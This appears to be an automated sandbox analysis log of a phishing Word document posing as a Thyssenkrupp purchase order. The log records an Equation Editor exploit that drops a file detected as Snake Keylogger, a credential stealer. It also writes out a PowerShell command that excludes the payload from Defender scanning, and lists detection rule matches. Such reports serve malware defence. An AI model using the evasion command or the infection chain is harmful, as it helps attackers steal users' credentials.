Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00678BA8	8_2_00678BA8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006798B0	8_2_006798B0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067AEB0	8_2_0067AEB0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006734B9	8_2_006734B9
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067BBB8	8_2_0067BBB8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067D180	8_2_0067D180
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00674A80	8_2_00674A80
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00676480	8_2_00676480
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00675788	8_2_00675788
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_0067DE88	8_2_0067DE88
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00677188	8_2_00677188
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00676490	8_2_00676490
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00677E9E	8_2_00677E9E
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00677198	8_2_00677198
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_00678B98	8_2_00678B98
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E2E78	8_2_006E2E78
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E0040	8_2_006E0040
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E3C38	8_2_006E3C38
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E50D8	8_2_006E50D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E3558	8_2_006E3558
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E9928	8_2_006E9928
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E4318	8_2_006E4318
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E49F8	8_2_006E49F8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006EB5C1	8_2_006EB5C1
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E57B8	8_2_006E57B8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E2E68	8_2_006E2E68
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E3C28	8_2_006E3C28
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006EA018	8_2_006EA018
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E2AF4	8_2_006E2AF4
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E50C8	8_2_006E50C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E0ED8	8_2_006E0ED8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E354A	8_2_006E354A
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E2121	8_2_006E2121
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E2130	8_2_006E2130
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E4308	8_2_006E4308
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E2B00	8_2_006E2B00
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E49E9	8_2_006E49E9
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E83C8	8_2_006E83C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E83D8	8_2_006E83D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 8_2_006E57A8	8_2_006E57A8

Source: Thyssenkrupp PO040232.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: XcsQpLjhNNvxYtrw[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hgqilegacy20306.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, UYIMtqoPLcKSuPT8Sm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	Security API names: _0020.SetAccessControl
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	Security API names: _0020.AddAccessRule
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	Security API names: _0020.SetAccessControl
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.cs	Security API names: _0020.AddAccessRule
Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, UYIMtqoPLcKSuPT8Sm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@9/15@89/9

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$yssenkrupp PO040232.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBF87.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................(..................................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................(..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................(..................................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n.......................<..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<..................................s............x....... .......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......(..........................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......:..........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......F..........................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....X..........................s............x.......$.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......d..........................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......v..........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............x.......2.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s....................l.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................<..................................s............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............x...............................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Thyssenkrupp PO040232.doc

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
